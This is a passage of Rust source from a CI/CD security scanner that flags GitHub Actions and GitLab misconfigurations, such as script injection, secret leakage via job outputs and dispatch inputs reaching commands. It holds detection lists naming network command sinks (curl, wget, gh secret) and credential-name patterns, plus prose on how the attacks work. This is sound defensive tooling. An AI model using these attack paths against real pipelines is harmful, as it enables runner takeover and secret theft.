3610    findings.extend(parameter_interpolation_into_shell(graph));
3611    // GHA red-team-derived rules
3612    findings.extend(runtime_script_fetched_from_floating_url(graph));
3613    findings.extend(pr_trigger_with_floating_action_ref(graph));
3614    findings.extend(check_homoglyph_in_action_ref(graph));
3615    findings.extend(untrusted_api_response_to_env_sink(graph));
3616    findings.extend(pr_build_pushes_image_with_floating_credentials(graph));
3617    findings.extend(secret_via_env_gate_to_untrusted_consumer(graph));
3618    // Blue-team positive invariants (negative-space rules — fire on absence
3619    // of expected defenses)
3620    findings.extend(no_workflow_level_permissions_block(graph));
3621    findings.extend(prod_deploy_job_no_environment_gate(graph));
3622    findings.extend(long_lived_secret_without_oidc_recommendation(graph));
3623    findings.extend(pull_request_workflow_inconsistent_fork_check(graph));
3624    findings.extend(gitlab_deploy_job_missing_protected_branch_only(graph));
3625    findings.extend(terraform_output_via_setvariable_shell_expansion(graph));
3626    // GHA council Bucket 1 rules
3627    findings.extend(risky_trigger_with_authority(graph));
3628    findings.extend(sensitive_value_in_job_output(graph));
3629    findings.extend(manual_dispatch_input_to_url_or_command(graph));
3630    // GHA council Bucket 2 rules
3631    findings.extend(secrets_inherit_overscoped_passthrough(graph));
3632    findings.extend(unsafe_pr_artifact_in_workflow_run_consumer(graph));
3633    // GHA council Bucket 3 rules
3634    findings.extend(script_injection_via_untrusted_context(graph));
3635    findings.extend(interactive_debug_action_in_authority_workflow(graph));
3636    findings.extend(pr_specific_cache_key_in_default_branch_consumer(graph));
3637    findings.extend(gh_cli_with_default_token_escalating(graph));
3638    // GitLab council Bucket A rules
3639    findings.extend(ci_job_token_to_external_api(graph));
3640    findings.extend(id_token_audience_overscoped(graph));
3641    findings.extend(untrusted_ci_var_in_shell_interpolation(graph));
3642    // GitLab council Bucket B+C rules
3643    findings.extend(unpinned_include_remote_or_branch_ref(graph));
3644    findings.extend(dind_service_grants_host_authority(graph));
3645    findings.extend(security_job_silently_skipped(graph));
3646    findings.extend(child_pipeline_trigger_inherits_authority(graph));
3647    findings.extend(cache_key_crosses_trust_boundary(graph));
3648    // GitLab red-team Group D rules
3649    findings.extend(pat_embedded_in_git_remote_url(graph));
3650    findings.extend(ci_token_triggers_downstream_with_variable_passthrough(
3651        graph,
3652    ));
3653    findings.extend(dotenv_artifact_flows_to_privileged_deployment(graph));
3654
3655    // Deduplicate structurally identical findings BEFORE compensating controls.
3656    // Order matters: compensating controls append to finding messages (e.g.
3657    // " [compensating control: ...]"), so deduping after them would fail to
3658    // collapse two BFS-duplicate findings where one CC-modified and the other
3659    // did not. Key on (category, nodes_involved, message) so distinct
3660    // per-variable findings on the same step are preserved.
3661    let mut seen_keys: std::collections::HashSet<(FindingCategory, Vec<NodeId>, String)> =
3662        std::collections::HashSet::new();
3663    findings
3664        .retain(|f| seen_keys.insert((f.category, f.nodes_involved.clone(), f.message.clone())));
3665
3666    // Blue-team compensating-control suppressions (downgrade or suppress
3667    // existing-rule findings when a control elsewhere in the graph
3668    // neutralises the risk). Applied after dedup so each unique finding
3669    // gets exactly one CC evaluation.
3670    apply_compensating_controls(graph, &mut findings);
3671
3672    findings.sort_by_key(|f| f.severity);
3673
3674    findings
3675}
3676
3677// ── R3: risky_trigger_with_authority ────────────────────
3678// `issue_comment`, `pull_request_review`, `pull_request_review_comment`, and
3679// `workflow_run` are high-blast-radius triggers — anyone able to comment on
3680// an issue (or any contributor whose previous workflow run completed) can
3681// fire the workflow with secrets in scope. `trigger_context_mismatch` only
3682// fires on `pull_request_target` / ADO `pr`, so this rule closes the gap.
3683
3684/// Trigger names that confer the same effective blast radius as
3685/// `pull_request_target` once they're paired with write permissions or
3686/// non-`GITHUB_TOKEN` secrets. Order is alphabetical for stable output.
3687const RISKY_TRIGGERS: &[&str] = &[
3688    "issue_comment",
3689    "pull_request_review",
3690    "pull_request_review_comment",
3691    "workflow_run",
3692];
3693
3694/// Returns true if the permissions string declares any GitHub Actions
3695/// write-grant scope (`*: write`) or `write-all`. Conservatively flags
3696/// any unscoped `write-all`. The check looks for `: write` substrings so
3697/// it catches `contents: write`, `pull-requests: write`, `id-token: write`,
3698/// etc., regardless of how `Permissions::Map` formats the surrounding map.
3699fn permissions_grant_writes(perm_string: &str) -> bool {
3700    let p = perm_string.to_lowercase();
3701    p.contains("write-all") || p.contains(": write")
3702}
3703
3704/// Rule: high-blast-radius trigger (`issue_comment`,
3705/// `pull_request_review[_comment]`, `workflow_run`) declared alongside
3706/// write-grant permissions or any non-`GITHUB_TOKEN` secret.
3707///
3708/// Detection (deterministic, no path traversal):
3709/// 1. Read `META_TRIGGERS` (graph metadata) — comma-joined list of every
3710///    trigger declared under `on:`.
3711/// 2. Filter for entries in `RISKY_TRIGGERS`.
3712/// 3. Inspect every Identity node carrying `META_PERMISSIONS` — if any
3713///    grants `: write` or `write-all`, the workflow holds write authority.
3714/// 4. Scan all Secret nodes; any whose name is not literally `GITHUB_TOKEN`
3715///    counts as a non-default secret in scope.
3716/// 5. Fire one finding per workflow when steps 1–2 match AND (3 OR 4).
3717///
3718/// Severity: High. The blast radius matches `pull_request_target` but the
3719/// trigger surface is broader (anyone with comment access vs. only PR
3720/// authors), so this rule never downgrades by trigger type.
3721pub fn risky_trigger_with_authority(graph: &AuthorityGraph) -> Vec<Finding> {
3722    let triggers_meta = match graph.metadata.get(META_TRIGGERS) {
3723        Some(t) => t,
3724        None => return Vec::new(),
3725    };
3726
3727    let risky_present: Vec<&str> = triggers_meta
3728        .split(',')
3729        .map(str::trim)
3730        .filter(|t| RISKY_TRIGGERS.iter().any(|r| r == t))
3731        .collect();
3732
3733    if risky_present.is_empty() {
3734        return Vec::new();
3735    }
3736
3737    // (3) Any Identity node with write permissions?
3738    let mut writes_identities: Vec<NodeId> = Vec::new();
3739    for ident in graph.nodes_of_kind(NodeKind::Identity) {
3740        if let Some(perms) = ident.metadata.get(META_PERMISSIONS) {
3741            if permissions_grant_writes(perms) {
3742                writes_identities.push(ident.id);
3743            }
3744        }
3745    }
3746
3747    // (4) Any non-GITHUB_TOKEN secret in scope?
3748    let non_default_secrets: Vec<NodeId> = graph
3749        .nodes_of_kind(NodeKind::Secret)
3750        .filter(|s| s.name != "GITHUB_TOKEN")
3751        .map(|s| s.id)
3752        .collect();
3753
3754    if writes_identities.is_empty() && non_default_secrets.is_empty() {
3755        return Vec::new();
3756    }
3757
3758    let trigger_label = risky_present.join(", ");
3759    let cause = if !writes_identities.is_empty() && !non_default_secrets.is_empty() {
3760        format!(
3761            "{} write-grant identit{} and {} non-default secret{}",
3762            writes_identities.len(),
3763            if writes_identities.len() == 1 {
3764                "y"
3765            } else {
3766                "ies"
3767            },
3768            non_default_secrets.len(),
3769            if non_default_secrets.len() == 1 {
3770                ""
3771            } else {
3772                "s"
3773            },
3774        )
3775    } else if !writes_identities.is_empty() {
3776        format!(
3777            "{} write-grant identit{}",
3778            writes_identities.len(),
3779            if writes_identities.len() == 1 {
3780                "y"
3781            } else {
3782                "ies"
3783            },
3784        )
3785    } else {
3786        format!(
3787            "{} non-default secret{}",
3788            non_default_secrets.len(),
3789            if non_default_secrets.len() == 1 {
3790                ""
3791            } else {
3792                "s"
3793            },
3794        )
3795    };
3796
3797    let mut nodes_involved = writes_identities.clone();
3798    nodes_involved.extend(non_default_secrets);
3799
3800    vec![Finding {
3801        severity: Severity::High,
3802        category: FindingCategory::RiskyTriggerWithAuthority,
3803        path: None,
3804        nodes_involved,
3805        message: format!(
3806            "Workflow trigger(s) [{trigger_label}] grant the same blast radius as pull_request_target but slip past trigger_context_mismatch — {cause} are reachable from any commenter / upstream-run author"
3807        ),
3808        recommendation: Recommendation::Manual {
3809            action: "Drop write-grant permissions to the minimum the trigger requires (most labelers/triagers only need `pull-requests: write` or `issues: write`), or split the workflow: keep the comment-triggered handler authority-free and gate privileged work behind a separate workflow that an authorized user must dispatch manually.".into(),
3810        },
3811        source: FindingSource::BuiltIn,
3812        extras: FindingExtras::default(),
3813    }]
3814}
3815
3816// ── R4: sensitive_value_in_job_output ───────────────────
3817// `jobs.<id>.outputs.<name>` is written to the run log (only the heuristic
3818// mask protects it) and propagates unmasked via `needs.<job>.outputs.*`.
3819// Sourcing an output from `secrets.*`, an OIDC-bearing step output, or
3820// giving it a credential-shaped name is a structural leak.
3821
3822/// Suffixes that mark a job-output name as credential-shaped. Matched
3823/// case-insensitively against the trailing segment of the output name.
3824const CREDENTIAL_NAME_SUFFIXES: &[&str] = &[
3825    "_token",
3826    "_secret",
3827    "_key",
3828    "_pem",
3829    "_password",
3830    "_credential",
3831    "_credentials",
3832    "_api_key",
3833];
3834
3835/// Returns true if `name` ends with any of `CREDENTIAL_NAME_SUFFIXES`,
3836/// matched case-insensitively.
3837fn output_name_is_credential_shaped(name: &str) -> bool {
3838    let lower = name.to_lowercase();
3839    CREDENTIAL_NAME_SUFFIXES.iter().any(|s| lower.ends_with(s))
3840}
3841
3842/// Rule: a `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
3843/// OIDC-bearing step output, or has a credential-shaped name (suffix
3844/// matches `_token` / `_secret` / `_key` / `_pem` / `_password` /
3845/// `_credential[s]` / `_api_key`).
3846///
3847/// Detection: read `META_JOB_OUTPUTS` (graph metadata) — pipe-delimited
3848/// records of `<job>\t<name>\t<source>`. For each record, fire a finding
3849/// when `source != "literal"` OR `name` matches a credential suffix.
3850///
3851/// Severity:
3852/// - **Critical** when `source == "secret"` (raw `secrets.*` value).
3853/// - **Critical** when `source == "oidc"` (OIDC token leaked via output).
3854/// - **High** when `source == "step_output"` AND name is credential-shaped.
3855/// - **High** when `source == "literal"` AND name is credential-shaped
3856///   (developer is signaling credential intent in the API).
3857/// - Otherwise no finding.
3858pub fn sensitive_value_in_job_output(graph: &AuthorityGraph) -> Vec<Finding> {
3859    let raw = match graph.metadata.get(META_JOB_OUTPUTS) {
3860        Some(s) if !s.is_empty() => s,
3861        _ => return Vec::new(),
3862    };
3863
3864    let mut findings = Vec::new();
3865
3866    for record in raw.split('|') {
3867        // Format: "<job>\t<name>\t<source>"
3868        let mut fields = record.splitn(3, '\t');
3869        let job = match fields.next() {
3870            Some(j) if !j.is_empty() => j,
3871            _ => continue,
3872        };
3873        let name = match fields.next() {
3874            Some(n) if !n.is_empty() => n,
3875            _ => continue,
3876        };
3877        let source = fields.next().unwrap_or("literal");
3878
3879        let credential_named = output_name_is_credential_shaped(name);
3880
3881        let (severity, reason) = match source {
3882            "secret" => (
3883                Severity::Critical,
3884                "value reads `secrets.*` directly — exfiltrated to run log and to every downstream `needs.*.outputs.*` consumer",
3885            ),
3886            "oidc" => (
3887                Severity::Critical,
3888                "value derives from a step that holds an OIDC identity — the federated token leaks through the output channel",
3889            ),
3890            "step_output" if credential_named => (
3891                Severity::High,
3892                "credential-shaped output name backed by a step output — masking is heuristic, downstream consumers see plaintext",
3893            ),
3894            "literal" if credential_named => (
3895                Severity::High,
3896                "credential-shaped output name with a literal value — either the value is a hard-coded secret or the contract leaks credentials to downstream jobs",
3897            ),
3898            _ => continue,
3899        };
3900
3901        findings.push(Finding {
3902            severity,
3903            category: FindingCategory::SensitiveValueInJobOutput,
3904            path: None,
3905            nodes_involved: Vec::new(),
3906            message: format!(
3907                "Job '{job}' declares output '{name}' — {reason}"
3908            ),
3909            recommendation: Recommendation::Manual {
3910                action: "Do not expose secrets, OIDC tokens, or credential-shaped values via `jobs.<id>.outputs.*`. Pass them between steps within a single job using `env:` (which honors masking) or write them to a secure file consumed only by a downstream step. If a downstream job needs to act on a credential, fetch it directly from the secret store inside that job instead of inheriting it through outputs.".into(),
3911            },
3912            source: FindingSource::BuiltIn,
3913            extras: FindingExtras::default(),
3914        });
3915    }
3916
3917    findings
3918}
3919
3920// ── R6: manual_dispatch_input_to_url_or_command ────────
3921// `workflow_dispatch.inputs.*` is attacker-controlled in any repository
3922// where collaborators have `Actions: write`. Flowing an input value into
3923// `curl` / `wget` / `gh api` / a `run:` URL / `actions/checkout` `ref:`
3924// gives the dispatcher arbitrary code execution against the runner — a
3925// pivot from "can run a workflow" to "can land arbitrary code on a
3926// privileged runner".
3927
3928/// Tokens that indicate command-line consumption of an input value when
3929/// they appear in the same `run:` body as the input expression. Each token
3930/// must be matched whole-word so we don't false-positive on `curlier` etc.
3931const COMMAND_SINKS: &[&str] = &[
3932    "curl",
3933    "wget",
3934    "gh api",
3935    "gh release",
3936    "gh secret",
3937    "gh repo",
3938    "git clone",
3939    "git fetch",
3940];
3941
3942/// Returns true if `body` contains a whole-word occurrence of `needle`.
3943/// "Whole word" = preceded by start-of-string or non-alphanumeric, and
3944/// followed by end-of-string or non-alphanumeric. Avoids matching
3945/// `curl` inside `curlier` or `git fetch` inside `git fetcher`.
3946fn body_contains_command(body: &str, needle: &str) -> bool {
3947    let mut start = 0;
3948    while let Some(rel) = body[start..].find(needle) {
3949        let abs = start + rel;
3950        let before_ok = abs == 0
3951            || !body
3952                .as_bytes()
3953                .get(abs - 1)
3954                .map(|b| b.is_ascii_alphanumeric() || *b == b'_')
3955                .unwrap_or(false);
3956        let after_idx = abs + needle.len();
3957        let after_ok = after_idx == body.len()
3958            || !body
3959                .as_bytes()
3960                .get(after_idx)
3961                .map(|b| b.is_ascii_alphanumeric() || *b == b'_')
3962                .unwrap_or(false);
3963        if before_ok && after_ok {
3964            return true;
3965        }
3966        start = abs + needle.len();
3967    }
3968    false
3969}
3970
3971/// Returns true if `body` references the dispatch input `name` via either
3972/// `${{ inputs.<name> }}` or `${{ github.event.inputs.<name> }}`. Tolerates
3973/// any whitespace inside the `${{ … }}` expression.
3974fn body_references_input(body: &str, name: &str) -> bool {
3975    // Substring forms — GHA accepts both `inputs.X` and `github.event.inputs.X`.
3976    let needle_a = format!("inputs.{name}");
3977    let needle_b = format!("github.event.inputs.{name}");
3978    body.contains(&needle_a) || body.contains(&needle_b)
3979}
3980
3981/// Rule: a `workflow_dispatch.inputs.*` value flows into a command sink
3982/// (`curl`, `wget`, `gh api`, `git clone`, …) or `actions/checkout`
3983/// `with.ref:`.
3984///
3985/// Detection:
3986/// 1. Read `META_DISPATCH_INPUTS` — comma-joined list of input names.
3987/// 2. For every Step node carrying `META_SCRIPT_BODY`, fire a finding when
3988///    the body references any input name AND contains a whole-word
3989///    occurrence of any `COMMAND_SINKS` entry.
3990/// 3. For every Step node carrying `META_CHECKOUT_REF`, fire a finding when
3991///    the ref expression references any input name (the ref is consumed by
3992///    `actions/checkout`, which performs `git fetch` / `git checkout`
3993///    against the supplied ref).
3994///
3995/// Severity: High. Dispatch is a privileged operation, but the privileged
3996/// surface is bounded to whoever holds `Actions: write` on the repo —
3997/// narrower than `pull_request_target`, broader than a maintainer-only
3998/// secret.
3999pub fn manual_dispatch_input_to_url_or_command(graph: &AuthorityGraph) -> Vec<Finding> {
4000    let inputs_meta = match graph.metadata.get(META_DISPATCH_INPUTS) {
4001        Some(s) if !s.is_empty() => s,
4002        _ => return Vec::new(),
4003    };
4004
4005    let inputs: Vec<&str> = inputs_meta
4006        .split(',')
4007        .map(str::trim)
4008        .filter(|s| !s.is_empty())
4009        .collect();
4010    if inputs.is_empty() {
4011        return Vec::new();
4012    }
4013
4014    let mut findings = Vec::new();
4015
4016    for step in graph.nodes_of_kind(NodeKind::Step) {
4017        // (a) Script body sink
4018        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
4019            let referenced: Vec<&str> = inputs
4020                .iter()
4021                .copied()
4022                .filter(|name| body_references_input(body, name))
4023                .collect();
4024            if !referenced.is_empty() {
4025                let sinks: Vec<&str> = COMMAND_SINKS
4026                    .iter()
4027                    .copied()
4028                    .filter(|s| body_contains_command(body, s))
4029                    .collect();
4030                if !sinks.is_empty() {
4031                    findings.push(Finding {
4032                        severity: Severity::High,
4033                        category: FindingCategory::ManualDispatchInputToUrlOrCommand,
4034                        path: None,
4035                        nodes_involved: vec![step.id],
4036                        message: format!(
4037                            "Step '{}' interpolates workflow_dispatch input(s) [{}] into command sink(s) [{}] — anyone with Actions:write can pivot the run to attacker-controlled hosts/refs",
4038                            step.name,
4039                            referenced.join(", "),
4040                            sinks.join(", "),
4041                        ),
4042                        recommendation: Recommendation::Manual {
4043                            action: "Pass the input through the step's `env:` block (where the runtime quotes it) and reference `\"$INPUT_NAME\"` in the script. For URLs, validate against an allowlist before fetching. Never let a dispatch input land in a `git clone` / `actions/checkout` ref without an explicit allowlist of permitted refs.".into(),
4044                        },
4045                        source: FindingSource::BuiltIn,
4046                        extras: FindingExtras::default(),
4047                    });
4048                }
4049            }
4050        }
4051
4052        // (b) actions/checkout ref sink
4053        if let Some(ref_expr) = step.metadata.get(META_CHECKOUT_REF) {
4054            let referenced: Vec<&str> = inputs
4055                .iter()
4056                .copied()
4057                .filter(|name| body_references_input(ref_expr, name))
4058                .collect();
4059            if !referenced.is_empty() {
4060                findings.push(Finding {
4061                    severity: Severity::High,
4062                    category: FindingCategory::ManualDispatchInputToUrlOrCommand,
4063                    path: None,
4064                    nodes_involved: vec![step.id],
4065                    message: format!(
4066                        "Step '{}' uses workflow_dispatch input(s) [{}] as the actions/checkout ref — the dispatcher chooses which commit lands on the privileged runner",
4067                        step.name,
4068                        referenced.join(", "),
4069                    ),
4070                    recommendation: Recommendation::Manual {
4071                        action: "Constrain the dispatch input via a `type: choice` `options:` allowlist of permitted refs/branches, or hard-code the ref and accept a different parameter (e.g. release tag) that maps onto a vetted ref.".into(),
4072                    },
4073                    source: FindingSource::BuiltIn,
4074                    extras: FindingExtras::default(),
4075                });
4076            }
4077        }
4078    }
4079
4080    findings
4081}
4082/// Set of trigger names whose runs are influenced by parties outside the
4083/// repo's write-permission set — anything that can be initiated by opening a
4084/// PR, commenting on an issue, or reacting to another workflow's outcome.
4085/// Used by `secrets_inherit_overscoped_passthrough` and
4086/// `unsafe_pr_artifact_in_workflow_run_consumer` to gate detection.
4087const RISKY_TRIGGER_NAMES: &[&str] = &[
4088    "pull_request",
4089    "pull_request_target",
4090    "pull_request_review",
4091    "pull_request_review_comment",
4092    "issue_comment",
4093    "workflow_run",
4094];
4095
4096/// Returns true if any trigger name in the comma-joined `META_TRIGGERS` list
4097/// matches a risky trigger.
4098fn graph_has_risky_trigger(graph: &AuthorityGraph) -> bool {
4099    let Some(triggers) = graph.metadata.get(META_TRIGGERS) else {
4100        return false;
4101    };
4102    triggers
4103        .split(',')
4104        .any(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4105}
4106
4107/// Returns the first risky trigger name present on the graph, for messaging.
4108fn first_risky_trigger(graph: &AuthorityGraph) -> Option<String> {
4109    let triggers = graph.metadata.get(META_TRIGGERS)?;
4110    triggers
4111        .split(',')
4112        .find(|t| RISKY_TRIGGER_NAMES.contains(&t.trim()))
4113        .map(|s| s.trim().to_string())
4114}
4115
4116/// Rule: reusable workflow call uses `secrets: inherit` under a risky trigger.
4117///
4118/// Fires once per Step node carrying `META_SECRETS_INHERIT = "true"` when the
4119/// graph's `META_TRIGGERS` set contains at least one attacker-influenced
4120/// trigger (`pull_request`, `pull_request_target`, `issue_comment`,
4121/// `workflow_run`, `pull_request_review`, `pull_request_review_comment`).
4122///
4123/// `secrets: inherit` forwards the entire caller secret bag to the callee
4124/// regardless of which secrets the callee actually consumes. Combined with a
4125/// trigger an external party can fire, every secret in scope is one
4126/// compromised callee away from exfiltration.
4127pub fn secrets_inherit_overscoped_passthrough(graph: &AuthorityGraph) -> Vec<Finding> {
4128    if !graph_has_risky_trigger(graph) {
4129        return Vec::new();
4130    }
4131    let trigger = first_risky_trigger(graph).unwrap_or_else(|| "risky".into());
4132
4133    let mut findings = Vec::new();
4134    for step in graph.nodes_of_kind(NodeKind::Step) {
4135        let inherits = step
4136            .metadata
4137            .get(META_SECRETS_INHERIT)
4138            .map(|v| v == "true")
4139            .unwrap_or(false);
4140        if !inherits {
4141            continue;
4142        }
4143
4144        // Find the reusable workflow target the step delegates to (if any) so
4145        // the message can name the callee.
4146        let target_name = graph
4147            .edges_from(step.id)
4148            .filter(|e| e.kind == EdgeKind::DelegatesTo)
4149            .filter_map(|e| graph.node(e.to))
4150            .find(|n| n.kind == NodeKind::Image)
4151            .map(|n| n.name.clone())
4152            .unwrap_or_else(|| "<unknown>".into());
4153
4154        findings.push(Finding {
4155            severity: Severity::High,
4156            category: FindingCategory::SecretsInheritOverscopedPassthrough,
4157            path: None,
4158            nodes_involved: vec![step.id],
4159            message: format!(
4160                "Job '{}' calls reusable workflow '{}' with `secrets: inherit` while the workflow is triggered by '{}' — every caller secret forwards to the callee regardless of need",
4161                step.name, target_name, trigger
4162            ),
4163            recommendation: Recommendation::Manual {
4164                action: "Replace `secrets: inherit` with an explicit `secrets:` mapping listing only the secrets the callee actually consumes. For PR/comment/workflow_run-triggered callers, audit the callee for log exposure of every forwarded secret.".into(),
4165            },
4166            source: FindingSource::BuiltIn,
4167            extras: FindingExtras::default(),
4168        });
4169    }
4170
4171    findings
4172}
4173
4174/// Rule: `workflow_run`/`pull_request_target` consumer downloads a PR-context
4175/// artifact AND interprets its content into a privileged sink.
4176///
4177/// Requires:
4178/// 1. Graph trigger is `workflow_run` or `pull_request_target` (the producer
4179///    ran in PR context, so the artifact is attacker-controlled).
4180/// 2. At least one Step in a job carries `META_DOWNLOADS_ARTIFACT = "true"`.
4181/// 3. At least one Step in the *same job* carries
4182///    `META_INTERPRETS_ARTIFACT = "true"` (post-to-comment, write to
4183///    `$GITHUB_ENV`, `eval`, `unzip`, `cat`, `jq`, …).
4184///
4185/// Differs from `artifact_boundary_crossing`: that rule flags upload→download
4186/// trust crossings on Artifact nodes; this rule additionally requires the
4187/// consumer interprets the downloaded content.
4188pub fn unsafe_pr_artifact_in_workflow_run_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4189    // Trigger gate: workflow_run consumers and pull_request_target both run
4190    // in upstream-repo context with elevated permissions while the artifact
4191    // (or PR head ref) originates from PR context.
4192    let triggers_ok = {
4193        let single = graph
4194            .metadata
4195            .get(META_TRIGGER)
4196            .map(|s| s == "workflow_run" || s == "pull_request_target")
4197            .unwrap_or(false);
4198        let multi = graph
4199            .metadata
4200            .get(META_TRIGGERS)
4201            .map(|s| {
4202                s.split(',')
4203                    .any(|t| t.trim() == "workflow_run" || t.trim() == "pull_request_target")
4204            })
4205            .unwrap_or(false);
4206        single || multi
4207    };
4208    if !triggers_ok {
4209        return Vec::new();
4210    }
4211
4212    // Group steps by job name so we can pair download + interpret within a job.
4213    use std::collections::BTreeMap;
4214    let mut by_job: BTreeMap<String, (Vec<NodeId>, Vec<NodeId>)> = BTreeMap::new();
4215    for step in graph.nodes_of_kind(NodeKind::Step) {
4216        let job = step
4217            .metadata
4218            .get(META_JOB_NAME)
4219            .cloned()
4220            .unwrap_or_default();
4221        let entry = by_job.entry(job).or_default();
4222        if step
4223            .metadata
4224            .get(META_DOWNLOADS_ARTIFACT)
4225            .map(|v| v == "true")
4226            .unwrap_or(false)
4227        {
4228            entry.0.push(step.id);
4229        }
4230        if step
4231            .metadata
4232            .get(META_INTERPRETS_ARTIFACT)
4233            .map(|v| v == "true")
4234            .unwrap_or(false)
4235        {
4236            entry.1.push(step.id);
4237        }
4238    }
4239
4240    let mut findings = Vec::new();
4241    for (job, (downloaders, interpreters)) in by_job {
4242        if downloaders.is_empty() || interpreters.is_empty() {
4243            continue;
4244        }
4245        let mut nodes_involved = downloaders.clone();
4246        nodes_involved.extend(interpreters.iter().copied());
4247
4248        let job_label = if job.is_empty() {
4249            "<workflow-level>".to_string()
4250        } else {
4251            job
4252        };
4253
4254        findings.push(Finding {
4255            severity: Severity::High,
4256            category: FindingCategory::UnsafePrArtifactInWorkflowRunConsumer,
4257            path: None,
4258            nodes_involved,
4259            message: format!(
4260                "Job '{}' downloads a PR-context artifact and interprets its content (post-to-comment, $GITHUB_ENV write, eval/unzip/cat/jq) — malicious PRs can write arbitrary content into the artifact while the consumer runs with upstream-repo authority",
4261                job_label
4262            ),
4263            recommendation: Recommendation::Manual {
4264                action: "Treat downloaded artifacts as untrusted: validate against a strict schema before parsing, never feed contents into `eval`/`$GITHUB_ENV`/`$GITHUB_OUTPUT`, and post comment bodies through a length-and-character-allowlist filter. Where possible, separate the privileged-sink step into its own job that does not download the artifact.".into(),
4265            },
4266            source: FindingSource::BuiltIn,
4267            extras: FindingExtras::default(),
4268        });
4269    }
4270
4271    findings
4272}
4273
4274// ── GHA security rules from corpus gap analysis ─────────────────────────
4275//
4276// Source: MEMORY/WORK/20260425-230443_taudit-gitlab-parser/corpus-results/council-gha-gaps.md
4277// Rules R1, R5, R9, R10. All four read META_SCRIPT_BODY (R1, R10) or
4278// step-level metadata stamped by the GHA parser (R5, R9). They gate on
4279// META_TRIGGERS where a specific trigger surface is required.
4280
4281/// Returns true if `triggers_csv` (the comma-separated value of META_TRIGGERS
4282/// stamped by the GHA parser) contains any of `wanted`. Tolerant of
4283/// whitespace and empty entries.
4284fn triggers_contain_any(triggers_csv: Option<&String>, wanted: &[&str]) -> bool {
4285    let Some(csv) = triggers_csv else {
4286        return false;
4287    };
4288    csv.split(',')
4289        .map(|s| s.trim())
4290        .any(|t| wanted.contains(&t))
4291}
4292
4293/// Substring locations of every `${{ ... }}` expression inside `body`. Returns
4294/// the inner trimmed expression text plus the byte range so callers can attach
4295/// surrounding-context heuristics. Doesn't try to handle nested `}}` — none of
4296/// the patterns we care about contain it.
4297fn find_template_expressions(body: &str) -> Vec<(String, std::ops::Range<usize>)> {
4298    let mut out = Vec::new();
4299    let mut cursor = 0usize;
4300    while let Some(rel_open) = body[cursor..].find("${{") {
4301        let open = cursor + rel_open;
4302        let inner_start = open + 3;
4303        let Some(rel_close) = body[inner_start..].find("}}") else {
4304            break;
4305        };
4306        let close = inner_start + rel_close;
4307        let expr = body[inner_start..close].trim().to_string();
4308        out.push((expr, open..close + 2));
4309        cursor = close + 2;
4310    }
4311    out
4312}
4313
4314/// Patterns that mark an attacker-controllable expression for R1.
4315/// Order matters only for documentation — detection is OR.
4316fn is_untrusted_context_expression(expr: &str) -> bool {
4317    // Strip leading/trailing whitespace already done by caller.
4318    // Examples: `github.event.issue.title`, `github.event.pull_request.body`,
4319    // `github.event.comment.body`, `github.event.review.body`,
4320    // `github.head_ref`, `inputs.target_branch`.
4321    if expr.starts_with("github.event.issue.")
4322        || expr.starts_with("github.event.pull_request.")
4323        || expr.starts_with("github.event.comment.")
4324        || expr.starts_with("github.event.review.")
4325        || expr.starts_with("github.event.discussion.")
4326        || expr.starts_with("github.event.workflow_run.")
4327        || expr.starts_with("github.event.inputs.")
4328    {
4329        return true;
4330    }
4331    if expr == "github.head_ref" || expr.starts_with("github.head_ref ") {
4332        return true;
4333    }
4334    // `inputs.X` is attacker-influenced under workflow_dispatch / workflow_run
4335    // / issue_comment-driven inputs. The rule's caller gates on the trigger
4336    // surface, so any `inputs.*` here is suspect.
4337    if let Some(rest) = expr.strip_prefix("inputs.") {
4338        if !rest.is_empty() {
4339            return true;
4340        }
4341    }
4342    false
4343}
4344
4345/// Returns true when an expression's value lands in a script sink that
4346/// matters for R1 — shell text, JS source, or a write to GITHUB_ENV /
4347/// GITHUB_OUTPUT. Heuristic: the expression is **not** the right-hand side of
4348/// a YAML `env:` mapping. The parser already separates step-level `env:`
4349/// mappings into the secret/auth machinery, so any expression appearing inside
4350/// the script body itself bypasses the env-indirection mitigation by
4351/// definition.
4352fn is_script_injection_sink(_body: &str, _range: &std::ops::Range<usize>) -> bool {
4353    // Every occurrence inside META_SCRIPT_BODY qualifies — the body is the
4354    // shell/JS source itself. (Step-level `env:` values are stored on the
4355    // edges, not in the body.) Kept as a function so the doc string spells
4356    // the rationale and future heuristics have a clear hook.
4357    true
4358}
4359
4360/// R1 — script injection via untrusted context.
4361///
4362/// Severity: Critical. Classic GitHub Actions remote code execution: an
4363/// expression that an external actor controls (`github.event.issue.title`,
4364/// `github.head_ref`, `github.event.inputs.*` under `workflow_dispatch`)
4365/// gets concatenated into the shell command (or JS source for
4366/// `actions/github-script`) at YAML-render time, before any quoting or
4367/// escaping the runtime would apply to env-bound values.
4368pub fn script_injection_via_untrusted_context(graph: &AuthorityGraph) -> Vec<Finding> {
4369    let mut findings = Vec::new();
4370
4371    for step in graph.nodes_of_kind(NodeKind::Step) {
4372        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4373            continue;
4374        };
4375        if body.is_empty() {
4376            continue;
4377        }
4378
4379        let mut hits: Vec<String> = Vec::new();
4380        for (expr, range) in find_template_expressions(body) {
4381            if !is_untrusted_context_expression(&expr) {
4382                continue;
4383            }
4384            if !is_script_injection_sink(body, &range) {
4385                continue;
4386            }
4387            if !hits.contains(&expr) {
4388                hits.push(expr);
4389            }
4390        }
4391
4392        if hits.is_empty() {
4393            continue;
4394        }
4395
4396        // Cap preview to keep the message readable even when a step has many
4397        // distinct attacker-controlled interpolations.
4398        let preview: String = hits
4399            .iter()
4400            .take(3)
4401            .map(|s| format!("${{{{ {s} }}}}"))
4402            .collect::<Vec<_>>()
4403            .join(", ");
4404        let suffix = if hits.len() > 3 {
4405            format!(", and {} more", hits.len() - 3)
4406        } else {
4407            String::new()
4408        };
4409
4410        findings.push(Finding {
4411            severity: Severity::Critical,
4412            category: FindingCategory::ScriptInjectionViaUntrustedContext,
4413            path: None,
4414            nodes_involved: vec![step.id],
4415            message: format!(
4416                "Step '{}' interpolates attacker-controlled expression(s) {preview}{suffix} directly into a script body without an env: indirection — classic GitHub Actions RCE",
4417                step.name
4418            ),
4419            recommendation: Recommendation::Manual {
4420                action: "Bind the expression to a step-level `env:` variable and reference it as `\"$VAR\"` (shell) or `process.env.VAR` (JS). The runtime then quotes the value as data instead of YAML-rendering it as code.".into(),
4421            },
4422            source: FindingSource::BuiltIn,
